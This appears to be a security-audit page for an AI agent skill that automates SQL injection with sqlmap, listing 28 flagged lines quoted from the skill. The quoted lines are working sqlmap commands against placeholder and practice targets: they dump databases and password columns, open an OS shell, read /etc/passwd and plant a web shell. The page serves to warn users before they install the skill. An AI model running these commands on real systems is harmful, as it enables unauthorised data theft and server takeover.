sqlmap-database-penetration-testing
Automates SQL injection testing and database penetration using SQLMap, enabling efficient vulnerability detection and data extraction.
Install this skill
Security score
The sqlmap-database-penetration-testing skill was audited on Feb 28, 2026 and we found 28 security issues across 2 threat categories, including 1 high-severity. Review the findings below before installing.
Categories Tested
Security Issues
Access to /etc/passwd
| 304 | sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch |
Access to root home directory
| 256 | sqlmap -r /root/Desktop/login.txt -p username --dbs --batch |
Access to root home directory
| 393 | sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session |
External URL reference
| 39 | http://target.com/page.php?id=1' |
External URL reference
| 48 | sqlmap -u "http://target.com/page.php?id=1" --batch |
External URL reference
| 51 | sqlmap -u "http://target.com/page.php?id=1" --batch -v 3 |
External URL reference
| 58 | sqlmap -u "http://target.com/page.php?id=1" --dbs --batch |
External URL reference
| 70 | sqlmap -u "http://target.com/page.php?id=1" -D database_name --tables --batch |
External URL reference
| 81 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --columns --batch |
External URL reference
| 92 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump --batch |
External URL reference
| 97 | sqlmap -u "http://target.com/page.php?id=1" -D database_name -T users -C username,password --dump --batch |
External URL reference
| 102 | sqlmap -u "http://target.com/page.php?id=1" -D database_name --dump-all --batch |
External URL reference
| 127 | # http://target1.com/page.php?id=1 |
External URL reference
| 128 | # http://target2.com/page.php?id=2 |
External URL reference
| 231 | sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" --dbs --batch |
External URL reference
| 235 | sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart --tables --batch |
External URL reference
| 239 | sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --columns --batch |
External URL reference
| 243 | sqlmap -u "http://testphp.vulnweb.com/artists.php?artist=1" -D acuart -T users --dump --batch |
External URL reference
| 262 | echo "http://192.168.1.10/sqli/Less-1/?id=1" > bulkfile.txt |
External URL reference
| 263 | echo "http://192.168.1.10/sqli/Less-2/?id=1" >> bulkfile.txt |
External URL reference
| 272 | sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --level=5 --risk=3 |
External URL reference
| 275 | sqlmap -u "http://target.com/page.php?id=1" --dbs --batch --technique=BEUSTQ |
External URL reference
| 281 | sqlmap -u "http://target.com/page.php?id=1" \ |
External URL reference
| 288 | sqlmap -u "http://target.com/page.php?id=1" \ |
External URL reference
| 298 | sqlmap -u "http://target.com/page.php?id=1" --os-shell --batch |
External URL reference
| 301 | sqlmap -u "http://target.com/page.php?id=1" --os-cmd="whoami" --batch |
External URL reference
| 304 | sqlmap -u "http://target.com/page.php?id=1" --file-read="/etc/passwd" --batch |
External URL reference
| 307 | sqlmap -u "http://target.com/page.php?id=1" --file-write="/local/shell.php" --file-dest="/var/www/html/shell.php" --batch |